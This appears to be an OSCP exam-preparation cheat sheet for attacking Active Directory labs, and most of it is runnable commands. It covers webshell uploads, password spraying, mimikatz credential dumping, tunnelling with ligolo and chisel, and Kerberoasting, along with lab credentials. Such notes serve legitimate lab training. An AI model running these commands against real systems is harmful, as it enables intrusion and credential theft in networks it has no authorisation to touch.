AD Set

Based on:

• PG Practice: Access, Hokkaido, Hutch, Nagoya, Resourced, Vault

• PEN-200: OSCP A, OSCP B, OSCP C

The AD set is an assumed breached scenario, i.e. starts on Creds. However, the techniques used on the PG Play boxes were included for completeness and can be useful for the Windows standalone machine.

No Creds

Port Scan

The nmap-scan script can be found here.

sudo nmap-scan <target-IP>

Domain Enumeration

• LDAP Null Bind (ldapsearch)

# Enumerate objects
ldapsearch -v -x -b "DC=DC01,DC=offsec" -H "ldap://192.168.120.108" "(objectclass=*)"

# Enumerate users' description field
uv run nxc ldap DC01 -u '' -p '' -M get-desc-users

• User Enumeration (kerbrute)

kerbrute userenum -d hokkaido-aerospace.com --dc hokka /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

• SMB Enumeration

  • enum4linux-ng

  • Null, Guest, Anonymous sessions

  • WRITE access (steal hashes)

• Password Spray with <user>:<user>

HTTP(S)

• Dirbust HTTP(S) ports with a directory list (plus server-specific extensions) and a file list

# Dirbust with a directory list
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -ic -ac -c -u http://access/FUZZ -e .aspx,.php,
​
​# Dirbust with a file list
ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -ic -ac -c -u http://access/FUZZ

• File Uploads

• WebDAV

# Connect to WebDAV
cadaver http://x7331
Authentication required for hutch on server 'x7331':
Username: x7331
Password:
# Upload a webshell
dav:/> put /usr/share/webshells/aspx/cmdasp.aspx cmdasp.aspx

# Upload a webshell directly
curl -T '/home/kali/shell.aspx' 'http://192.168.64.122/' -u x7331:Pass123!

• Custom wordlists

# Create a userlist based on the site users
username-anarchy -i site_users > anarchy_output

# Create a passlist based on the site content
cewl --write cewl_output http://192.168.202.21/

SMB

• List and enumerate shares

# List shares and permissions
uv run nxc smb DC01 -u celia.almeda -p 7k8XHk3dMtmpnC7 --shares

# Download the target share
nxc smb MS02 -u x7331 -p Pass123! -M spider_plus -o DOWNLOAD_FLAG=True OUTPUT_FOLDER=./ MAX_FILE_SIZE=99999999

• WRITE access (steal hashes)

MS01

Creds

User Context

• Privileges (if GUI access check for token elevation) and Groups

# User's privileges
whoami /priv

# User's groups
whoami /groups

• PS History

# History files of all host's users (assuming default path)
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}

Host Enumeration

• WinPEAS

• Local Services

Remote Access ✅

Check for WinRM, RDP, and SSH access:

for service in winrm rdp ssh;do uv run nxc "$service" domain_hosts -u celia.almeda -p 7k8XHk3dMtmpnC7;echo;done | grep +

SMB

• List and enumerate shares

# List shares and permissions
uv run nxc smb DC01 -u celia.almeda -p 7k8XHk3dMtmpnC7 --shares

# Download the target share
nxc smb MS02 -u x7331 -p Pass123! -M spider_plus -o DOWNLOAD_FLAG=True OUTPUT_FOLDER=./ MAX_FILE_SIZE=99999999

• WRITE access (steal hashes)

Post-Exploitation (Cached Creds) ✅

• Dump cached credentials

# Upload binary from the WinRM session
*Evil-WinRM* PS C:\Users\Administrator> upload mimikatz.exe

# Dump active sessions' creds
*Evil-WinRM* PS C:\Users\Administrator>.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

# Dump the SAM registry hive
*Evil-WinRM* PS C:\Users\Administrator>.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"

# Dump the LSA secrets
*Evil-WinRM* PS C:\Users\Administrator>.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::secrets" "exit"

• Password Spray

$ for file in domain_*;do cat "$file";echo;done

$ uv run nxc smb ms01 -u domain_users -p domain_passwords --continue-on-success | grep +
​
$ uv run nxc smb ms01 -u domain_users -H domain_hashes --continue-on-success | grep +

Pivot (Route to the domain) ✅

# Launch the ligolo server
$ sudo ligolo-proxy -selfcert -laddr 192.168.45.216:443

# Upload ligolo-agent via WinRM
*Evil-WinRM* PS C:\Users\eric.wallows\Documents> upload agent.exe

# Connect to the server
*Evil-WinRM* PS C:\Users\eric.wallows\Documents> .\agent.exe -connect 192.168.45.216:443 -ignore-cert

# Configure the routing
ligolo-ng » INFO[0052] Agent joined.   id=0050569e00f6 name="OSCP\\eric.wallows@MS01" remote="192.168.103.141:49318"
ligolo-ng » session
? Specify a session : 1 - OSCP\eric.wallows@MS01 - 192.168.103.141:49318 - 0050569e00f6
[Agent : OSCP\eric.wallows@MS01] » autoroute
? Select routes to add: 10.10.63.141/24
? Create a new interface or use an existing one? Create a new interface
INFO[0105] Generating a random interface name...
INFO[0105] Using interface name savinglester
INFO[0105] Creating routes for savinglester...
? Start the tunnel? Yes
INFO[0106] Starting tunnel to OSCP\eric.wallows@MS01 (0050569e00f6)

AD Attacks (Domain Data) ✅

• Domain Data (userlist, bloodhound)

# Create a domain user's list
uv run nxc smb DC01 -u celia.almeda -p 7k8XHk3dMtmpnC7 --users | awk '$1 == "SMB" && $5 != "[+]" && $5 != "-Username-" && $5 != "[*]" && $5 != "Guest" && $5 != "krbtgt" {print $5}' > domain_users

# Collect domain data
uv run nxc ldap DC01.oscp.exam -u celia.almeda -p 7k8XHk3dMtmpnC7 --bloodhound -c All --dns-server 10.10.63.140

• Password Spray

  • <user>:<user>

uv run nxc smb domain_hosts -u domain_users -H domain_hashes --continue-on-success | grep +
​
uv run nxc smb domain_hosts -u domain_users -p domain_passwords --continue-on-success | grep +

• Kerberoast

impacket-GetUserSPNs -request -dc-ip DC01 oscp.exam/celia.almeda:7k8XHk3dMtmpnC7

• AS-REPRoast

impacket-GetNPUsers oscp.exam/ -dc-ip DC01 -no-pass -usersfile domain_users

MS02

User Context

• Privileges (if GUI access check for token elevation) and Groups

# User's privileges
whoami /priv

# User's groups
whoami /groups

• PS History

# History files of all host's users (assuming default path)
foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}

Host Enumeration

• WinPEAS

• Local Services

# Start the chisel server on the attacking host
./chisel server -p 8000 --reverse

# Connect from the target host
.\chisel.exe client 192.168.45.157:8000 R:6033:127.0.0.1:3306

# Enumerate the forwarded port
mysql -h 127.0.0.1 -P 6033 -u root

SMB

• List and enumerate shares

# List shares and permissions
uv run nxc smb DC01 -u celia.almeda -p 7k8XHk3dMtmpnC7 --shares

# Download the target share
nxc smb MS02 -u x7331 -p Pass123! -M spider_plus -o DOWNLOAD_FLAG=True OUTPUT_FOLDER=./ MAX_FILE_SIZE=99999999

• WRITE access (steal hashes)

MSSQL

• Enumerate tables

• Links

• Users

• xp_cmdshell

  • Host enumeration

AD Attacks

• If SPNs (e.g. MSSQL) try Silver ticket

Post-Exploitation (Cached Creds)

• Dump cached credentials

# Upload binary from the WinRM session
*Evil-WinRM* PS C:\Users\Administrator> upload mimikatz.exe

# Dump active sessions' creds
*Evil-WinRM* PS C:\Users\Administrator>.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

# Dump the SAM registry hive
*Evil-WinRM* PS C:\Users\Administrator>.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"

# Dump the LSA secrets
*Evil-WinRM* PS C:\Users\Administrator>.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::secrets" "exit"

• Password Spray

$ for file in domain_*;do cat "$file";echo;done

$ uv run nxc smb ms01 -u domain_users -p domain_passwords --continue-on-success | grep +
​
$ uv run nxc smb ms01 -u domain_users -H domain_hashes --continue-on-success | grep +